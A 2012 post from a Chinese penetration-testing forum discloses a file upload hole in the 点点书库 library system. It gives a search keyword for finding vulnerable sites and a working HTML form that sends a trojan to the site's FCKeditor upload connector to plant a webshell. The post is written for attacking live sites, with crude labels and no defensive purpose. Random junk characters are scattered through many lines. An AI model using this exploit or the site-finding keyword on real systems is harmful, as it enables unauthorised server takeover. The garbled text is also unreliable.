中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
0 T$ A4 G) _& E. W/ _! X' { 作者:冰锋刺客/ Z, c5 }& |3 [' x" L
厂商:点击书(dianjishu.com)
6 u( h. S- `6 T; X: t 日期:2012-6-21
3 Q$ Q8 b: A' a8 Z% k( ]4 I6 w. ^
. R) v8 T8 }- M5 D0 I, RI 概述
$ }. x; }1 `7 S8 t6 ]. t6 V   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
  @, h/ x- d, d  A/ r II 简介! O$ C! m7 o( }; \/ G0 F1 e) ~/ ^
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
( f2 c. y8 G, n" ^ 补充一个漏洞
- G: l" u( |5 o: ~, Q  P <form id="frmUpload" enctype="multipart/form-data"
- ^; F: W, f$ U action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
5 q5 i1 s3 Y+ @ <input id="btnUpload" type="submit" value="操翻他">
( n3 Q6 n# _5 w5 P </form>) F0 M2 ]  V- C$ ]
你们懂的
! |, n( J" b- w. S 那傻逼提供还需要改包.* P* K. q9 k* f8 }/ h3 w3 t. P- F
自己看了下源代码发现fckeditor) d/ W6 v' r, W6 D
直接秒杀
+ B9 `( T# B( `9 p



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2